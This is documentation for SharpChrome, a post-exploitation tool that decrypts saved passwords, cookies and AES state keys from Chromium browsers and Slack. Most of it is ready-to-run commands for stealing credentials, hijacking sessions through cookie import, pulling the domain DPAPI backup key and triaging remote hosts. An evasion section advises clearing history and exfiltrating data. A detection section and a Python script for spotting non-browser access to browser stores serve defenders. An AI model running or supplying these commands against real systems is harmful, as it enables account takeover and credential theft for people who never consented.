  __                 _
 (_  |_   _. ._ ._  /  |_  ._ _  ._ _   _
 __) | | (_| |  |_) \_ | | | (_) | | | (/_
                |
  v1.9.0

What is SharpChrome?

SharpChrome is a Chromium-based browser credential extraction tool built as a subproject of SharpDPAPI. It specializes in decrypting saved passwords, cookies, and state keys from Chrome, Edge, Brave, and Slack applications that use Chromium’s credential storage system.
SharpChrome is an adaptation of @djhohnstein’s SharpChrome project with enhancements including lockless SQLite database access and AES state key decryption for Chrome 80+.

Supported Applications

Google Chrome

Original Chromium browser - cookies and login data

Microsoft Edge

Chromium-based Edge browser credentials

Brave Browser

Privacy-focused Chromium browser data

Slack

Slack desktop application credentials

Key Features

  • Cookies
  • Logins
  • State Keys
  • Domain Operations

Extract Browser Cookies:
  • Decrypt saved session cookies
  • Filter by cookie name or URL with regex
  • Export in EditThisCookie JSON format
  • Set cookies to never expire for persistence

Chrome 80+ Architecture Changes

Starting with Chrome 80, Google changed how credentials are encrypted:
SharpChrome automatically detects Chrome versions and uses the appropriate decryption method. For Chrome 80+, it first decrypts the AES state key, then uses it to decrypt cookies and logins.

Command Overview

logins

Extract and decrypt saved login credentials from Chromium-based browsers.
# Decrypt current user's Chrome logins
SharpChrome.exe logins

# Target Edge browser
SharpChrome.exe logins /browser:edge

# Use domain backup key for any user
SharpChrome.exe logins /pvk:key.pvk

# Remote system triage
SharpChrome.exe logins /server:workstation.domain.com /pvk:key.pvk

cookies

Extract and decrypt browser cookies for session hijacking or analysis.
# Get all cookies for current user
SharpChrome.exe cookies

# Filter by cookie name (regex)
SharpChrome.exe cookies /cookie:"session.*"

# Filter by URL (regex)
SharpChrome.exe cookies /url:".*github\.com.*"

# Export in EditThisCookie JSON format
SharpChrome.exe cookies /format:json /setneverexpire

# Target specific browser
SharpChrome.exe cookies /browser:brave

statekeys

Extract and decrypt AES state keys required for Chrome 80+ decryption.
# Extract state keys for all Chromium apps
SharpChrome.exe statekeys

# Use extracted state key with other commands
SharpChrome.exe cookies /statekey:AABBCC...

# Target specific application
SharpChrome.exe statekeys /browser:slack

backupkey

Retrieve the domain DPAPI backup key from a domain controller (same as SharpDPAPI).
# Retrieve domain backup key
SharpChrome.exe backupkey

# Specify DC and output file
SharpChrome.exe backupkey /server:dc.domain.com /file:key.pvk

Decryption Methods

  • Automatic (CryptUnprotectData)
  • Domain Backup Key
  • User Credentials
  • Masterkey Mappings

When run from an unelevated context, SharpChrome automatically uses CryptUnprotectData() to decrypt the current user’s data:
# Run as current user - no additional arguments needed
SharpChrome.exe logins
SharpChrome.exe cookies
Requirements:
  • Running in target user’s context
  • No elevation needed
  • Only decrypts current user’s data

Common Arguments

  • Decryption
  • Targeting
  • Output
  • Filtering (Cookies Only)
Argument           Description
/unprotect         Force CryptUnprotectData() (default when unprivileged)
/pvk:BASE64...     Use base64-encoded domain backup key
/pvk:key.pvk       Use domain backup key file
/password:X        Decrypt using plaintext password
/ntlm:X            Decrypt using NTLM hash
/prekey:X          Use DPAPI prekey (from Mimikatz)
/rpc               Decrypt by asking domain controller
{GUID}:SHA1 ...    Use explicit masterkey mappings
/statekey:X        Use pre-decrypted AES state key

Step 1: Extract Target Cookies

# Extract GitHub session cookies
SharpChrome.exe cookies /url:".*github\.com.*" /format:json /setneverexpire /pvk:key.pvk

Step 2: Import into Browser

  1. Install EditThisCookie extension
  2. Navigate to target site (e.g., github.com)
  3. Click EditThisCookie icon
  4. Click import button
  5. Paste JSON output from SharpChrome

Step 3: Access Target Account

Refresh the page - you’re now authenticated as the target user

Typical Workflows

# No privileges required - decrypt your own data
SharpChrome.exe logins
SharpChrome.exe cookies /url:".*company\.com.*"

# Works for all supported browsers
SharpChrome.exe logins /browser:edge
SharpChrome.exe cookies /browser:brave

# 1. Extract masterkeys from LSASS with Mimikatz
mimikatz# sekurlsa::dpapi

# 2. Decrypt all users' Chrome data
SharpChrome.exe logins {GUID1}:SHA1 {GUID2}:SHA1
SharpChrome.exe cookies {GUID1}:SHA1 {GUID2}:SHA1

# 1. Retrieve domain backup key
SharpChrome.exe backupkey /file:key.pvk

# 2. Triage local system
SharpChrome.exe logins /pvk:key.pvk
SharpChrome.exe cookies /pvk:key.pvk

# 3. Triage remote systems
SharpChrome.exe logins /pvk:key.pvk /server:workstation1.domain.com
SharpChrome.exe logins /pvk:key.pvk /server:workstation2.domain.com

# 4. Extract specific high-value cookies
SharpChrome.exe cookies /pvk:key.pvk /url:".*aws\.amazon\.com.*" /format:json

# 1. Copy Local State and Login Data files from target

# 2. Decrypt state key
SharpChrome.exe statekeys /target:"C:\Evidence\Local State" /pvk:key.pvk

# 3. Use state key to decrypt logins
SharpChrome.exe logins /target:"C:\Evidence\Login Data" /statekey:AABBCC...

Lockless Database Access

SharpChrome uses a modified C# SQLite library that supports lockless opening of databases. This means Chrome/Edge does not need to be closed, and database files don’t need to be copied to another location before analysis.
Benefits:
  • No need to close browser before extraction
  • Direct access to live databases
  • Reduced forensic footprint
  • Faster operations
Implementation:
  • Uses WAL (Write-Ahead Logging) mode
  • Read-only access to database
  • No interference with running browser

Detection Considerations

SharpChrome operations generate various indicators that can be detected by security monitoring tools.
File Access Indicators:
  • Reading Chrome/Edge/Brave user data directories
  • Accessing Login Data and Cookies SQLite databases
  • Reading Local State files
  • Accessing user DPAPI masterkey folders
Process Indicators:
  • SharpChrome.exe execution
  • Unusual SQLite database access patterns
  • Non-browser processes accessing browser data
  • SMB access to browser data on remote systems
  • MS-BKRP protocol for backup key retrieval
  • DC RPC calls for domain backup key
  • Bulk access to multiple users’ browser data
  • Accessing browser databases while browser is running
  • Reading Local State files for state key extraction
  • Simultaneous access to DPAPI and browser data
Detection:
  • Monitor access to browser data directories
  • Alert on non-browser processes accessing SQLite databases
  • Track DPAPI masterkey folder access
  • Detect domain backup key retrieval
Prevention:
  • Use hardware tokens for critical accounts
  • Implement browser extensions that require re-authentication
  • Monitor for cookie theft/session hijacking
  • Regular credential rotation
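
The file-access indicators listed above, expressed as detection logic over file-access records. This is an added example, not part of SharpChrome or the original page; the event fields (`image`, `pid`, `path`), the tag names and the browser allowlist are assumptions, and the sample events are constructed.

```python
import re
from collections import defaultdict

# Credential stores named on this page, under the default per-user profile paths.
BROWSER_DATA = re.compile(
    r"\\Users\\(?P<user>[^\\]+)\\AppData\\(?:Local\\(?:Google\\Chrome|Microsoft\\Edge"
    r"|BraveSoftware\\Brave-Browser)\\User Data|Roaming\\Slack)\\"
    r"(?:.*\\)?(?P<store>Login Data|Cookies|Local State)$", re.I)
MASTERKEYS = re.compile(r"\\AppData\\Roaming\\Microsoft\\Protect\\", re.I)
# Assumption: image names allowed to touch these files; extend for your environment.
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "slack.exe"}

def triage(events):
    """Map (image, pid) of each non-browser process that read a store to its alert tags."""
    seen = defaultdict(lambda: {"stores": set(), "users": set(), "dpapi": False})
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        if image in BROWSERS:
            continue
        state = seen[(image, ev["pid"])]
        hit = BROWSER_DATA.search(ev["path"])
        if hit:
            state["stores"].add(hit["store"].title())
            state["users"].add(hit["user"].lower())
        elif MASTERKEYS.search(ev["path"]):
            state["dpapi"] = True
    findings = {}
    for proc, state in seen.items():
        if not state["stores"]:
            continue  # never touched a browser store
        tags = ["non_browser_access"]
        if state["dpapi"]:
            tags.append("dpapi_and_browser_data")
        if len(state["users"]) > 1:
            tags.append("multi_user_bulk_access")
        findings[proc] = tags
    return findings

# Constructed sample events (simplified file-access records, not real telemetry).
CHROME = "\\AppData\\Local\\Google\\Chrome\\User Data\\"
SAMPLE = [
    {"image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "pid": 100,
     "path": "C:\\Users\\alice" + CHROME + "Default\\Login Data"},
    {"image": "C:\\Temp\\tool.exe", "pid": 200, "path": "C:\\Users\\alice" + CHROME + "Local State"},
    {"image": "C:\\Temp\\tool.exe", "pid": 200, "path": "C:\\Users\\bob" + CHROME + "Default\\Network\\Cookies"},
    {"image": "C:\\Temp\\tool.exe", "pid": 200,
     "path": "C:\\Users\\bob\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-0-0-0-1001\\key"},
    {"image": "C:\\Windows\\System32\\notepad.exe", "pid": 300, "path": "C:\\Users\\bob\\Documents\\a.txt"},
]
```

Matching on the image file name alone is easy to evade by renaming a binary, so a production rule should compare the full image path or signer, and should allowlist backup and endpoint-protection agents that legitimately read these files.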

SQLite Library

SharpChrome uses a minimized, modified version of a C# SQLite library that supports:
  • Lockless database opening
  • Read-only access mode
  • WAL mode support
  • Direct file access without copying
SharpChrome is built as a separate project in the SharpDPAPI solution due to the size of the SQLite library.

BCrypt Implementation

SharpChrome includes a minimized version of @AArnott’s BCrypt P/Invoke code released under the MIT License for AES state key decryption.

Prerequisites

  • Visual Studio 2019 Community Edition or later
  • .NET Framework 3.5 (default target)
  • Can be retargeted to .NET 4.0 or 4.5
  • Larger binary size due to SQLite library
  • Windows operating system
  • .NET Framework on target
  • Chromium-based browser installed (Chrome, Edge, Brave, or Slack)
Current User Context:
  • No elevation required
  • Can only decrypt current user’s data
Elevated Context:
  • Local Admin: Can decrypt all users on system
  • Domain Admin: Can decrypt any domain user with backup key

Operational Security

Minimize Detection:
  • Use from current user context when possible
  • Avoid dumping all cookies/logins unnecessarily
  • Target specific high-value accounts with filtering
  • Use /consoleoutfile to minimize screen artifacts
Post-Exploitation:
  • Delete temporary files
  • Clear command history
  • Consider in-memory execution
  • Exfiltrate data securely
  • Embed in post-exploitation frameworks
  • Automate with PowerShell wrappers
  • Combine with credential spraying
  • Use for lateral movement via cookie hijacking

Output Formats

  • CSV (Default)
  • Table
  • JSON (Cookies Only)

url,username,password
https://github.com/login,user@example.com,SecretPassword123
https://mail.google.com,admin@company.com,GooglePassword456
Best for: Log analysis, data processing, spreadsheet import

License

SharpChrome is part of SharpDPAPI and is licensed under the BSD 3-Clause license.
SharpChrome is adapted from @djhohnstein’s work and incorporates DPAPI functionality from Benjamin Delpy’s Mimikatz project.